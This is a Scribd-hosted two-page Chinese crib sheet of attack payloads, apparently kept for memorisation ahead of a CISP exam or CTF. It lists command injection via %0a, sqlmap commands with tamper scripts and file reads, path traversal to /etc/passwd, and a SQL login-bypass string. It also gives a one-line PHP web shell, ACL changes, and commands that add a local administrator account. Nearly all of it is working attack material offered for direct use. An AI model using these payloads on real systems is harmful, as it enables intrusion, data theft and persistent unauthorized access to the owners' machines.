Scribd Logo
Upload

Welcome to Scribd!

  • 3 views

    nealwe cisp payload背诵

    Uploaded by

    john68175607

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    nealwe cisp payload背诵

    Uploaded by

    john68175607
    3 views2 pages

    Original Title

    nealwe_cisp_payload背诵

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    3 views2 pages

    nealwe cisp payload背诵

    Uploaded by

    john68175607

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 2

    payload背 诵 .md to payload背 诵 .

    pdf by MARKDOWN-THEMEABLE-PDF

    命令执行
    %0a换行

    ip=127.0.0.1%0als

    注入

    D:\安 全 工 具 \漏 洞 利 用 \SQLMap\procs\mssqlserver

    tamper的使用 ( --tamper "space2commet,versionedmorekeywords.py" )

    sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py" -v 3 --dbs

    读取文件 ( --file-read /tmp/key2 )

    python sqlmap.py -u "http://172.18.0.15/id=-1'(*)%23" --tamper=space2comment --dbs -D security --file-read /tmp/key2

    文件包含
    %00 截断

    /etc/passwd%00

    ../ 截断

    ../../../../../../../../../../../../etc/passwd

    查找
    dir C:\ /s /b | find "flag"

    或者 for /r C:\ %i in (*flag*) do @echo %i

    aspnet_regiis.exe解密

    aspnet_regiis.exe -pdf "connectionStrings" "c:\web"

    http://www.freebuf.com/articles/web/55577.html

    http://blog.csdn.net/zminr411421_/article/details/52115783

    http://blog.csdn.net/qq_39591494/article/details/79206282

    http://www.freebuf.com/articles/web/55577.html

    PAYLOAD

    1. sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py" -v 3 --dbs

    Page 1/2 © Copyright Sunday, Feb 4, 2018, 4:22 PM by COMPANYNAME


    payload背 诵 .md to payload背 诵 .pdf by MARKDOWN-THEMEABLE-PDF

    2. python sqlmap.py -u "http://172.18.0.15/id=-1'(*)%23" --tamper=space2comment --dbs -D security --file-read /tmp/key2

    3. admin' Or '1' = '1 --+

    4. <?PhP @system($_REQUEST['c']);?>
    http://XXX.XXX.XXX.XXX/system/upload/XXX.php?c=cat ../../../key.php

    5. for /r C:\ %i in (*flag.*) do @echo %i

    6. cacls C:\users\... /E /C /G Administrator:F

    7. ......exe -pdf connection C:\web

    8. net user test test /ADD


    net localgroup Administrators test /ADD

    9. konboot

    Page 2/2 © Copyright Sunday, Feb 4, 2018, 4:22 PM by COMPANYNAME

    You might also like